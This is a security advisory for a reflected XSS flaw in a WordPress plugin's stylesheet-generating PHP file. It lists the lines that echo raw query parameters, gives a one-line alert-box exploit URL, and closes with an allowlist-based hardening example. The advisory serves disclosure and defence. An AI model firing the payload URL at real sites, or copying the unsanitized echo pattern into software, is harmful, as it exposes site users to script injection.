Advisory #: 774
Title: Reflected XSS in WordPress plugin bbpress-social-network v9.2
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/bbpress-social-network
Downloads: 3365
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: bbpress-social-network
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./bbpress-social-network/css/ln_livenotifications_css.php:

    640: color: <?php echo $_GET['dropdown_color'];?>;
    673: color: <?php echo $_GET['dropdown_color'];?>;
    700: background-color: <?php echo $_GET['banner_bgcolor']?>;
    1009:/*background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;*/
    1063: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
    1064: color: <?php echo $_GET['dropdown_link_color']?>;
    1076: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;
    1082: background: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
    1083: color: <?php echo $_GET['dropdown_link_color'];?>;
    1095: background: <?php echo $_GET['dropdown_hover_bgcolor'];?>;
    1135: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
    1143: background-color: <?php echo $_GET['dropdown_hover_bgcolor'];?>;
    1150: background-color: <?php echo $_GET['dropdown_bit_bgcolor'];?>;
    1183: color: <?php echo $_GET['dropdown_link_color'];?>;
    1187: color: <?php echo $_GET['dropdown_link_color'];?> !important;
    1191: color: <?php echo $_GET['dropdown_link_color'];?>;
    1196: color: <?php echo $_GET['dropdown_link_color'];?>;
    1201: color: <?php echo $_GET['dropdown_link_color'];?>;
    1232: color:<?php echo $_GET['dropdown_color'];?>;
    1240: color: <?php echo $_GET['dropdown_link_color'];?>;
    1250: color: <?php echo $_GET['dropdown_link_color'];?>;
    1285: color: <?php echo $_GET['dropdown_link_color'];?>;
    1292: color: <?php echo $_GET['dropdown_link_color'];?>;
    1325: /*background: <?php echo $_GET['dropdown_hover_bgcolor'];?> right center no-repeat;*/
    1480: color: <?php echo $_GET['dropdown_link_color'];?> !important;
    1493: color: <?php echo $_GET['dropdown_color'];?>;
    1498: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>;
    1499: background: <?php echo $_GET['dropdown_bit_color'];?>;
    1510: border-top:1px solid <?php echo $_GET['dropdown_bit_color'];?>;
    1554: border-top:1px solid <?php echo $_GET['dropdown_boder_color'];?>;
    1555: border-bottom:1px solid <?php echo $_GET['dropdown_boder_color'];?>;
    1558: color: <?php echo $_GET['dropdown_color'];?>;

The variable dropdown_color appears to send unsanitized data back to the user's browser.
CVE-ID: Not Released
File:./bbpress-social-network/css/ln_livenotifications_css.php
Exploit Code:
The exploit was derived from the first vulnerable parameter that appears in the code; there could be more, as shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
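
The listing under Vulnerability echoes query-string values straight into the generated stylesheet. As an added example (not the plugin's code and not a vendor fix), the PHP below emits the same kind of CSS with each value checked against a colour allowlist first; css_color_param(), the fallback colours and the .ln-example selectors are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the `echo $_GET[...]` pattern in the advisory.
// css_color_param(), the fallbacks and the selectors below are hypothetical.

// Declare the response as CSS and stop browsers from sniffing it as HTML.
header('Content-Type: text/css; charset=utf-8');
header('X-Content-Type-Options: nosniff');

/**
 * Return $query[$name] only when it is a plain CSS colour token,
 * otherwise return $fallback. Nothing outside the allowlist is echoed.
 */
function css_color_param(array $query, string $name, string $fallback): string
{
    $value = $query[$name] ?? null;
    if (!is_string($value)) {
        // Missing parameter, or an array such as ?dropdown_color[]=x
        return $fallback;
    }
    $value = trim($value);

    // Hex colours: #rgb, #rgba, #rrggbb, #rrggbbaa
    if (preg_match('/\A#(?:[0-9a-fA-F]{3,4}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})\z/', $value)) {
        return strtolower($value);
    }
    // Colour keywords (red, transparent, inherit ...): letters only, bounded length
    if (preg_match('/\A[a-zA-Z]{3,20}\z/', $value)) {
        return strtolower($value);
    }
    // Quotes, angle brackets, semicolons, braces, url(...) and so on end up here.
    return $fallback;
}

// Validate once, then reuse the checked values in the template.
$dropdown_color      = css_color_param($_GET, 'dropdown_color', '#333333');
$dropdown_link_color = css_color_param($_GET, 'dropdown_link_color', '#0066cc');
$banner_bgcolor      = css_color_param($_GET, 'banner_bgcolor', '#ffffff');
?>
.ln-example-dropdown { color: <?php echo $dropdown_color; ?>; }
.ln-example-dropdown a { color: <?php echo $dropdown_link_color; ?>; }
.ln-example-banner { background-color: <?php echo $banner_bgcolor; ?>; }
```

The remaining parameters in the listing (dropdown_bit_bgcolor, dropdown_hover_bgcolor, dropdown_boder_color, dropdown_bit_color) would go through the same check before being written into the stylesheet.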